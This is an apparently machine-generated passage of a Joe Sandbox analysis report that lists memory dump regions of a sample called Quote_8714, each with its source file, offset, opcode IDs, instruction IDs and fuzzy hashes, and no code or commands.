                                                                                                      • Instruction Fuzzy Hash: 5A21D134B042908FC705AB39D894AAE7BE2FF89610B1845B9D555CB361CB389C07C750
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 965bdf4de4e5e7891c065afb8d68866a560b49be9c442ae25db4a9ede3b615de
                                                                                                      • Instruction ID: 4935f7a103077b39a830384d3ad845a93a1887948468b80bcd34013d7c2d28f3
                                                                                                      • Opcode Fuzzy Hash: 965bdf4de4e5e7891c065afb8d68866a560b49be9c442ae25db4a9ede3b615de
                                                                                                      • Instruction Fuzzy Hash: 5B21A171B00105AFE704DF798D4496BBBF6EFD4214B15C169E609C72A1EE34F8438B90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746535613.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_f8d000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db335a32b17860eaf5254de562b4e245b511f68c4ab08597b853ab1033fa132f
                                                                                                      • Instruction ID: 02cfe0951ad3c0b8e9d6ec5c5b2536f79979906b37dff048f8e7b9a47beed3df
                                                                                                      • Opcode Fuzzy Hash: db335a32b17860eaf5254de562b4e245b511f68c4ab08597b853ab1033fa132f
                                                                                                      • Instruction Fuzzy Hash: 9B213772500204DFDB05EF14D9C4B67BF65FF98324F20C169E9094B296C336E856EBA2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 11ab31eef48d928d3fda815b96db3bd3d4b95e9b4b70c9aaa9d074f352cf3bf8
                                                                                                      • Instruction ID: f712d319178d11799e5eeed884f8d1f9b2afa64849b732411738524a8bce1517
                                                                                                      • Opcode Fuzzy Hash: 11ab31eef48d928d3fda815b96db3bd3d4b95e9b4b70c9aaa9d074f352cf3bf8
                                                                                                      • Instruction Fuzzy Hash: B221D475E0020A8FEF05DFB88D505EEBBB6EF88204B14453AD505F72A0EB349A028761
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746574249.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_f9d000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2dea1724ac25138f8f148583caf82141a91b34883d9fa86c0fc4ddda4a91d749
                                                                                                      • Instruction ID: 70f76be29634bfdf87dbdc5ca8294843b1aff16d59f7c3c24ae648ec462446ad
                                                                                                      • Opcode Fuzzy Hash: 2dea1724ac25138f8f148583caf82141a91b34883d9fa86c0fc4ddda4a91d749
                                                                                                      • Instruction Fuzzy Hash: 6321F271A04200DFEF14DF24D984B26BBA5FB84324F30C569D94A4B2AAC33AD847DA61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746574249.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_f9d000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fc3ccd8dd10dfc02f0354de00148a69b5b0930e0df139d7126b9247fe631a36d
                                                                                                      • Instruction ID: 4e204616a79b5edd9eeb2e8ffe3919f46dd99fc8a9dd04961325cef46a97b956
                                                                                                      • Opcode Fuzzy Hash: fc3ccd8dd10dfc02f0354de00148a69b5b0930e0df139d7126b9247fe631a36d
                                                                                                      • Instruction Fuzzy Hash: E8212671904204EFEF05DF14DAC0B26BBA5FB84324F30C66DE9094B296C336D846DA61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 730769840a62b95115500c818a846711ab6f92e6f2cea775bf71fcdd33ba952e
                                                                                                      • Instruction ID: c4dbb202552811431019899577f4b085fed1fd74b5953c9ea0f3105a5ecc1843
                                                                                                      • Opcode Fuzzy Hash: 730769840a62b95115500c818a846711ab6f92e6f2cea775bf71fcdd33ba952e
                                                                                                      • Instruction Fuzzy Hash: 68214131D106099FCB10EF68D840599FBF4FF59310B50C26AE958A7200EB30A999CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2416aa9cd6e957b10ea3457c1e075f792255a33761f24611dfe6c6c8347c59a7
                                                                                                      • Instruction ID: 673f792d6467acfd9ccd3b2424648223fd3628fefe2213bf9c3a3ec53388b087
                                                                                                      • Opcode Fuzzy Hash: 2416aa9cd6e957b10ea3457c1e075f792255a33761f24611dfe6c6c8347c59a7
                                                                                                      • Instruction Fuzzy Hash: 3C21C375A002054FC704EB38C8458AFBBE5EF84704B1189A9D646DF361EF75ED0A8F91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c6c36941be76a433755b9b087c779efe0c66800c00c43663e2432d65b16b6d10
                                                                                                      • Instruction ID: 9c46f443a9397a7fc230453bfa0306b2d6cf73d6dfc207ca37a9484c366c9135
                                                                                                      • Opcode Fuzzy Hash: c6c36941be76a433755b9b087c779efe0c66800c00c43663e2432d65b16b6d10
                                                                                                      • Instruction Fuzzy Hash: A1114C36B101549FDB18CE6DD844CAABBF5FF8C320B1540A9E519EB361DA31EC12CB60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746574249.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_f9d000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 707fa7008e98249bba7d3a1c9673eac238e669a2a49b4321b6b32e48b9e244fd
                                                                                                      • Instruction ID: 1634cd27c0cca1f8c3848dfc8abae631a27821689e457f6b05f47ee623cf87aa
                                                                                                      • Opcode Fuzzy Hash: 707fa7008e98249bba7d3a1c9673eac238e669a2a49b4321b6b32e48b9e244fd
                                                                                                      • Instruction Fuzzy Hash: 582150755093808FDB12CF24D994715BF71EB46314F28C5EAD8498F6A7C33A980ADB62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 565159bdcd21e65831b6c942cb930de95f803bfd23ea456bfa17ab3fedd7ed98
                                                                                                      • Instruction ID: 6c57198e4a54c4868e8e26b9eee70ad140377434f093e9d5158495a115f1e0c2
                                                                                                      • Opcode Fuzzy Hash: 565159bdcd21e65831b6c942cb930de95f803bfd23ea456bfa17ab3fedd7ed98
                                                                                                      • Instruction Fuzzy Hash: 16118E367542008FE7249A29CC896A93B92EF85710F1D84BAE149CF3B7DA39EC07C750
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746535613.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_f8d000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                      • Instruction ID: f2a6d04cee532cd1d862f4ba4f6c6fac5f55469579796039569a79ca937979b7
                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                      • Instruction Fuzzy Hash: F111E172904240DFCB06DF00D5C4B56BF71FF94324F24C2A9D8090B256C33AE85ADBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 81a1cd7016f17dd297ec955c74ca7f885b236208c165007cb8c1114f8e704e6e
                                                                                                      • Instruction ID: d486b90c41516b9d1cc05cd90b95abc0bb88dd0dd6e1553afbf4435913652f88
                                                                                                      • Opcode Fuzzy Hash: 81a1cd7016f17dd297ec955c74ca7f885b236208c165007cb8c1114f8e704e6e
                                                                                                      • Instruction Fuzzy Hash: 65012671B01214EFDB06A7A8AC514BEBF75DFC4218B00006FDF05E73A2C9259A0387DA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746574249.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_f9d000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                      • Instruction ID: d542b4b6e69981c1b935baeadc6273e27be7edc5bc19224ed80f99c4f407afe3
                                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                      • Instruction Fuzzy Hash: 6E11BB75904280DFDB06CF10C9C4B15BBA1FB84324F24C6AAD8494B296C33AD80ADB61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8865d32e3014ec3a45c2fef15562e19b6a46ee5b2bf18d3a42ba33b1d3bb6ee8
                                                                                                      • Instruction ID: 0e3a5761d300edc161c94c4c50c3ac60cccd3d5824f666c1cb969399f36a6397
                                                                                                      • Opcode Fuzzy Hash: 8865d32e3014ec3a45c2fef15562e19b6a46ee5b2bf18d3a42ba33b1d3bb6ee8
                                                                                                      • Instruction Fuzzy Hash: 5E11DB356001149FEB04DF68DC586EF7BB2EF88720F144239E502EB356DA759C06CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4d78e8694f2c25d5c6e4954b864e7a08c042795d53a2a53706a0609f69e6bdf8
                                                                                                      • Instruction ID: a6d80e69b32a8dd6e4657ee55d9b6d2f31e3605d0583ad7dcd915c0932f01b1a
                                                                                                      • Opcode Fuzzy Hash: 4d78e8694f2c25d5c6e4954b864e7a08c042795d53a2a53706a0609f69e6bdf8
                                                                                                      • Instruction Fuzzy Hash: F41102B1D046489FDB10DF9AD944A9EFBF4EF48320F14842AE859B7320D374A945CFA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7996a4a4bd41a3728dfeebf1da30c3898532e3eeab0098dc588e8f385143c4e7
                                                                                                      • Instruction ID: ef9bbdca58e230a99a0c0c8d3d7988d161fbec3980713e5bd7b48765f47c3db1
                                                                                                      • Opcode Fuzzy Hash: 7996a4a4bd41a3728dfeebf1da30c3898532e3eeab0098dc588e8f385143c4e7
                                                                                                      • Instruction Fuzzy Hash: 9E1102B1C002088FDB10DF9AD944ADEFBF4EF88320F14842AD859A7220D378A546CFA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7c0ce402263bf6d5e5f0538c9fc25c5f244acffba497f8f65917c4cb71d0cebd
                                                                                                      • Instruction ID: 9c0c251b95b381d96a6ea29884edf7465f33e34214d2b6134f7fef4fe3e258dd
                                                                                                      • Opcode Fuzzy Hash: 7c0ce402263bf6d5e5f0538c9fc25c5f244acffba497f8f65917c4cb71d0cebd
                                                                                                      • Instruction Fuzzy Hash: 411102B1D046089FDB10DF9AD944A9EFBF4EF48320F14842AE859B7320D374A945CFA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 765be64d44e758df1d426874317e0b79f25150b087353e58a693656b4fa403a4
                                                                                                      • Instruction ID: ebbe155e15426c6d0a84744b073cbcf5f971a419ef974d2a8e5be95f8092598a
                                                                                                      • Opcode Fuzzy Hash: 765be64d44e758df1d426874317e0b79f25150b087353e58a693656b4fa403a4
                                                                                                      • Instruction Fuzzy Hash: 1F1133B19002489FDB20DF9AC944BDEFBF4EF48324F10845AD919A7311C374A945CFA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f110c390f3eb8f971a124910976d31a73788932f0fc14dfc4a38fef376cea6a8
                                                                                                      • Instruction ID: 77a36dc97f1ed496785e9ed44d29116bd5e2be9b0b14ceb30f5c9cfb4de535e8
                                                                                                      • Opcode Fuzzy Hash: f110c390f3eb8f971a124910976d31a73788932f0fc14dfc4a38fef376cea6a8
                                                                                                      • Instruction Fuzzy Hash: FE1133B58002088FDB10DF99C945BDEFBF4EB08320F10851AD958A7311C338A945CFA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 699ac968d6c3fc57b9336276a07ad863fa4b990c73107d1a92c0374fadafb1de
                                                                                                      • Instruction ID: 43651f9ac528b92d840d046978745a81d1b2ed83184c712b67b7bf6b1de75dc3
                                                                                                      • Opcode Fuzzy Hash: 699ac968d6c3fc57b9336276a07ad863fa4b990c73107d1a92c0374fadafb1de
                                                                                                      • Instruction Fuzzy Hash: 8501D431A001149FEB04EF68D808AAF7BF6EF88710F144169E102EB356DE759C05CBA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 777abca172dbc85ea076d6c9d77e117835d0e340e18704c797982eb803ebce93
                                                                                                      • Instruction ID: 999dcca6c1ec94ac96e51a36d1708a22ea92dee836e11821f71f415926dd3177
                                                                                                      • Opcode Fuzzy Hash: 777abca172dbc85ea076d6c9d77e117835d0e340e18704c797982eb803ebce93
                                                                                                      • Instruction Fuzzy Hash: 65012931A007048FD725EF39C81055AB7F6EF85308B50CA6EE6469B264EB71E983CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 198c8c74bafa93c94e29e8971e25ce825480c33c246bef6ff5ab83d39c30dc32
                                                                                                      • Instruction ID: 65eba3c1bf812bbe61e1f4924a2b2d6e21bb5593a14740b5df23f54b0849fe0e
                                                                                                      • Opcode Fuzzy Hash: 198c8c74bafa93c94e29e8971e25ce825480c33c246bef6ff5ab83d39c30dc32
                                                                                                      • Instruction Fuzzy Hash: FF015E319007058FE315EF38C850656B7B6EF86308F54866DD6469B264EB71F883CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f857bf4d3cb4ea5090e7c1e1bd03e7a5160ddaf8052658124710f21a39a9e132
                                                                                                      • Instruction ID: b192afd26c196df05036b0b1748c32b4dcbb3af2a1db5f8c76706583d1a5bfca
                                                                                                      • Opcode Fuzzy Hash: f857bf4d3cb4ea5090e7c1e1bd03e7a5160ddaf8052658124710f21a39a9e132
                                                                                                      • Instruction Fuzzy Hash: B4F090357085118FFB245E259C64E7E37AA9F80A4270A417AE602CF6B1DE20FC03DB61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d88abc828426df4330685e71ed67a90540734d6eebcd8b5698c9580d82ed4d0a
                                                                                                      • Instruction ID: e469380772aa5278f6117289af982ded28e658d351c9c079bb2c01abe51f9601
                                                                                                      • Opcode Fuzzy Hash: d88abc828426df4330685e71ed67a90540734d6eebcd8b5698c9580d82ed4d0a
                                                                                                      • Instruction Fuzzy Hash: EF01AD32A007048BEB117A38CC006AEB765EFD1314F09456DDA45A7354EF34F54786D5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c2032e42fd7b8d4baea5b3eea7399f8bf9ba93ab2743b898825a6c01b10383c2
                                                                                                      • Instruction ID: f843164bdb0b3ec88473f337d7275e3d737ee844682d5672131ca4093547f333
                                                                                                      • Opcode Fuzzy Hash: c2032e42fd7b8d4baea5b3eea7399f8bf9ba93ab2743b898825a6c01b10383c2
                                                                                                      • Instruction Fuzzy Hash: 0DF024313002204BFB196A38AD1067E37969FD4B50709017AE602CB3F0DE24EC03C796
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0914671b100ec91f995d0c26ef3c389156f601bc1ca244eff67c61ee812fc65e
                                                                                                      • Instruction ID: 3cf8c0cea5a44360e0f77b5a10f13b0b37a163b7b4b6cc3c0cbe447ba47f96a2
                                                                                                      • Opcode Fuzzy Hash: 0914671b100ec91f995d0c26ef3c389156f601bc1ca244eff67c61ee812fc65e
                                                                                                      • Instruction Fuzzy Hash: 8AF0E9313055118BFA249E2A9C54E3E73D99FC4B41705443EAB12CF270DE60FC039A50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 52db9dcd609497db84e8b91995d64ff054edb3ab32b60071d3a713111c20f15f
                                                                                                      • Instruction ID: 895d428c2e731a5b53ca065d12990c5638cedb1fd2b683c4ef31997365358d9d
                                                                                                      • Opcode Fuzzy Hash: 52db9dcd609497db84e8b91995d64ff054edb3ab32b60071d3a713111c20f15f
                                                                                                      • Instruction Fuzzy Hash: 84F09671B00119EB9F15F6A89C504BEBBBA9FC851CB00002AEF05A7350DE35AA1387DA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 996ec67bd5317dc944ee084d20b3dac068efaac9c70e127a2e45efe583d2ab77
                                                                                                      • Instruction ID: 6d443708f709c6c16d43b40fbc37bd12a5cf4e7af2086b52a40579d036a05017
                                                                                                      • Opcode Fuzzy Hash: 996ec67bd5317dc944ee084d20b3dac068efaac9c70e127a2e45efe583d2ab77
                                                                                                      • Instruction Fuzzy Hash: CA011671E00609DFCB40EFA8C5458EDBBF0EF49300B1185ABE459EB322E7309A45CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7a4bf462b4c8e8c668975c48089c835307e2b15ed4b6bcdd806b7890becc8e1b
                                                                                                      • Instruction ID: 642633b67a27f3d43aa5768b0ac1a9a2425d2de88f020d166e6044283349ca7a
                                                                                                      • Opcode Fuzzy Hash: 7a4bf462b4c8e8c668975c48089c835307e2b15ed4b6bcdd806b7890becc8e1b
                                                                                                      • Instruction Fuzzy Hash: 55F0C2322006008FC3116B1AEC84A9AFBBAEF89721B050599E14A87761DF30AC86C794
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a2a0d2d73d9f5b07969451bff99a776784e5eb5ed0c4af87f92f439471de1fd4
                                                                                                      • Instruction ID: 75c107fc6487c73db08090627b4c868e01148f9d22fc1f50793bb9d849764eb9
                                                                                                      • Opcode Fuzzy Hash: a2a0d2d73d9f5b07969451bff99a776784e5eb5ed0c4af87f92f439471de1fd4
                                                                                                      • Instruction Fuzzy Hash: 30F0E2367007154F8714AB6EF88486EBBEAEFC4225300467AE20AC7370CF70EC4A8794
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1f8a74f7fef1a7e57ff7d83ea8ce29556785046febe76b28c056f0fe53dd1da0
                                                                                                      • Instruction ID: 5215086c6bf3dbd1f19539cd2fba444d8499899fcc1367ef038af7144db6dd7d
                                                                                                      • Opcode Fuzzy Hash: 1f8a74f7fef1a7e57ff7d83ea8ce29556785046febe76b28c056f0fe53dd1da0
                                                                                                      • Instruction Fuzzy Hash: 76F0CD31A007048BEB12BA788C004EEB77AEFC5714F04466DDA49A7364EF30B987C6D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 90683f9330b88baa1bf56125697f869861b1391401e99f20e12decee460852de
                                                                                                      • Instruction ID: 601d92d93afd196a06c9a229be88fd98bb142a83571ec2edf30f0d808b411194
                                                                                                      • Opcode Fuzzy Hash: 90683f9330b88baa1bf56125697f869861b1391401e99f20e12decee460852de
                                                                                                      • Instruction Fuzzy Hash: E5F0823130062057AB196A399D1463E769A9FD4A547194139EB06CB3B0DE24F80387DA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
